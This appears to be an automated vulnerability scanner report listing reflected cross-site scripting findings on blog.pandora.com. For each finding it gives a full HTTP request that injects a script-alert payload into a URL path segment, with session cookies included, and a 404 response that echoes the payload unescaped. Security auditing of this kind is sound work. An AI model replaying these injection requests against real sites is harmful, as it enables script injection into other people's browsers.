GET /pandora73e85<script>alert(1)</script>ab709179510/archives/2005/11/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:24 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora73e85<script>alert(1)</script>ab709179510/archives/2005/11/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 52080<script>alert(1)</script>69601ecbd83 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives52080<script>alert(1)</script>69601ecbd83/2005/11/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:27 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives52080<script>alert(1)</script>69601ecbd83/2005/11/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload f1a55<script>alert(1)</script>2930f5de171 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2005f1a55<script>alert(1)</script>2930f5de171/11/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:29 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2005f1a55<script>alert(1)</script>2930f5de171/11/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f891c<script>alert(1)</script>910256c07c6 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2005/11f891c<script>alert(1)</script>910256c07c6/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:32 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2005/11f891c<script>alert(1)</script>910256c07c6/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 812a3<script>alert(1)</script>4963365f5f1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora812a3<script>alert(1)</script>4963365f5f1/archives/2005/12/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:23 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora812a3<script>alert(1)</script>4963365f5f1/archives/2005/12/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload bb8f3<script>alert(1)</script>2960d34c74e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesbb8f3<script>alert(1)</script>2960d34c74e/2005/12/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:25 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 349 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesbb8f3<script>alert(1)</script>2960d34c74e/2005/12/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 97499<script>alert(1)</script>74af091ba5d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/200597499<script>alert(1)</script>74af091ba5d/12/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:28 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/200597499<script>alert(1)</script>74af091ba5d/12/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d6250<script>alert(1)</script>f5b95efae30 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2005/12d6250<script>alert(1)</script>f5b95efae30/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:30 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2005/12d6250<script>alert(1)</script>f5b95efae30/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 176cf<script>alert(1)</script>b4e0ebb55d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora176cf<script>alert(1)</script>b4e0ebb55d/archives/2006/01/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:22 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 348
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora176cf<script>alert(1)</script>b4e0ebb55d/archives/2006/01/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a4d2d<script>alert(1)</script>1fffc06b069 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesa4d2d<script>alert(1)</script>1fffc06b069/2006/01/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:25 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesa4d2d<script>alert(1)</script>1fffc06b069/2006/01/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b5cfe<script>alert(1)</script>3585d67671d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2006b5cfe<script>alert(1)</script>3585d67671d/01/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:27 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2006b5cfe<script>alert(1)</script>3585d67671d/01/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 86220<script>alert(1)</script>bfa750f2e3a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2006/0186220<script>alert(1)</script>bfa750f2e3a/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:30 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 349 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2006/0186220<script>alert(1)</script>bfa750f2e3a/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 37767<script>alert(1)</script>96a3bdaf0ab was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora37767<script>alert(1)</script>96a3bdaf0ab/archives/2006/02/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:24 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora37767<script>alert(1)</script>96a3bdaf0ab/archives/2006/02/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5bb5d<script>alert(1)</script>6b31a0b7960 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives5bb5d<script>alert(1)</script>6b31a0b7960/2006/02/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:26 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives5bb5d<script>alert(1)</script>6b31a0b7960/2006/02/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 654b6<script>alert(1)</script>c48ada1686b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2006654b6<script>alert(1)</script>c48ada1686b/02/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:28 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2006654b6<script>alert(1)</script>c48ada1686b/02/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 5aa91<script>alert(1)</script>9eb948f65af was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2006/025aa91<script>alert(1)</script>9eb948f65af/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:31 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2006/025aa91<script>alert(1)</script>9eb948f65af/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d88f4<script>alert(1)</script>a463141d672 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandorad88f4<script>alert(1)</script>a463141d672/archives/2006/03/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:59 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandorad88f4<script>alert(1)</script>a463141d672/archives/2006/03/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 970b7<script>alert(1)</script>535a013270b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives970b7<script>alert(1)</script>535a013270b/2006/03/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:07:01 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives970b7<script>alert(1)</script>535a013270b/2006/03/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 35243<script>alert(1)</script>cbe6a64b700 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/200635243<script>alert(1)</script>cbe6a64b700/03/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:07:03 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/200635243<script>alert(1)</script>cbe6a64b700/03/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 5e7ab<script>alert(1)</script>fa977886cf6 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2006/035e7ab<script>alert(1)</script>fa977886cf6/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:07:07 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2006/035e7ab<script>alert(1)</script>fa977886cf6/ was not found on this server.</p> ...[SNIP]...
